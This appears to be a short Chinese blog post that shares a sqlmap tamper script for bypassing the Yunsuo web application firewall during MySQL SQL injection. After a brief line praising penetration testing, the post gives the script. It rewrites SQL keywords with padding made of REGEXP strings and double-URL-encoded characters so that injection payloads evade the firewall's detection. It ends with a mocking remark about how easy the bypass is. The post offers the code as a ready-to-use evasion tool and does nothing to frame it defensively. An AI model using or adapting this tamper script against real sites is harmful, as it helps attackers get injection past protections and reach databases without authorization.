bypass

渗透测试确实是一门艺术，需要独特的方法、坚持的决心、长期的经验以及快速学习新技术的能力。非常期待渗透过程中出现的独特挑战，并欣赏该领域的动态特性 。 

 

 

*- coding: utf-8 -*

import re
import os

from lib.core.data import kb
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
__priority__ = PRIORITY.LOW

def dependencies():
    singleTimeWarnMessage("Bypass yunsuo by pureqh'%s' only %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))

def tamper(payload, **kwargs):

        payload=payload.replace(" ","  ",1)
        payload=payload.replace("  AND"," REGEXP \"[...%252523]\" and",1)
        payload=re.sub(r'(ORDER BY \d+)', "x", payload)
        payload=payload.replace("UNION"," REGEXP \"[...%252523]\" union",1)
        payload=payload.replace("(SELECT (CASE WHEN ("," REGEXP \"[...%252523]\" (SELECT (CASE WHEN (",1)
        payload=payload.replace("  AS "," REGEXP \"[...%252523]\" as ",1)
        payload=payload.replace(" OR "," REGEXP \"[...%252523]\" or ",1)
        payload=payload.replace("  WHERE "," REGEXP \"[...%252523]\" where ",1)
        payload=payload.replace("HIGH_RISK_OPERATION:0"," REGEXP \"[...%252523]\"  ",1)
        payload=payload.replace(";","; REGEXP \"[...%252523]\"  HTGH",1)
        payload=payload.replace("||","; || REGEXP \"[...%252523]\" ",1)
        payload=payload.replace("THEN"," THEN REGEXP \"[...%252523]\" ",1)
        payload=payload.replace("  IN"," REGEXP \"[...%252523]\"  IN ",1)
        payload=payload.replace("+"," REGEXP \"[...%252523]\"  + ",1)
        payload=payload.replace("WHEN"," REGEXP \"[...%252523]\"   ",1)
        return payload

　　换个payload就行了，好蠢啊哈哈哈